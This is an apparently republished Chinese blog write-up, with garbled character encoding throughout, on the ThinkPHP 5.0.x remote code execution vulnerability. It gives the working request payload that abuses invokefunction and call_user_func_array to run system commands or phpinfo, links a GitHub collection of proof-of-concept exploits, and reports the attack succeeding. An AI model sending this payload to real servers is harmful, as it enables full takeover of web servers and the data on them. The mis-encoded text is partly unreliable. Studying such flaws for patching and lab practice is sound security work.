漏洞出現(xiàn)的背景:
ThinkPHP是?款運?極?的PHP開發(fā)框架。
其5.0.23以前的版本中,獲取method的?法中沒有正確處理?法名,
導(dǎo)致攻擊者可以調(diào)?Request類任意?法并構(gòu)造利?鏈,從?導(dǎo)致遠程代碼執(zhí)?漏洞。
由于ThinkPHP5框架對控制器名沒有進??夠的安全檢測,導(dǎo)致在沒有開啟強制路由的情況下,構(gòu)造特定的請求。
從網(wǎng)上下載源碼
從網(wǎng)上搜索thinkphp5.0.21漏洞,發(fā)現(xiàn)存在遠程命令執(zhí)行漏洞
ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在沒有開啟強制路由的情況下可能存在遠程代碼執(zhí)行漏洞。攻擊者通過該漏洞可能完全控制Web服務(wù)器。?
:網(wǎng)頁只顯示了tinkphp,我們已知thinkphp是存在漏洞的,直接Github搜索thinkphp漏洞(https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection),發(fā)現(xiàn):
通過github上面的漏洞報告可知,我們可以
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令參數(shù)
就是遠程代碼執(zhí)行漏洞啦,輸入命令就返回什么 。
舉個例子,我們可以讓他執(zhí)行phpinfo操作,輸入;
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
成功執(zhí)行命令執(zhí)行漏洞,回顯php
文章來源:http://www.zghlxwxcb.cn/news/detail-443669.html
?文章來源地址http://www.zghlxwxcb.cn/news/detail-443669.html
到了這里,關(guān)于ThinkPHP5.0.21遠程命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!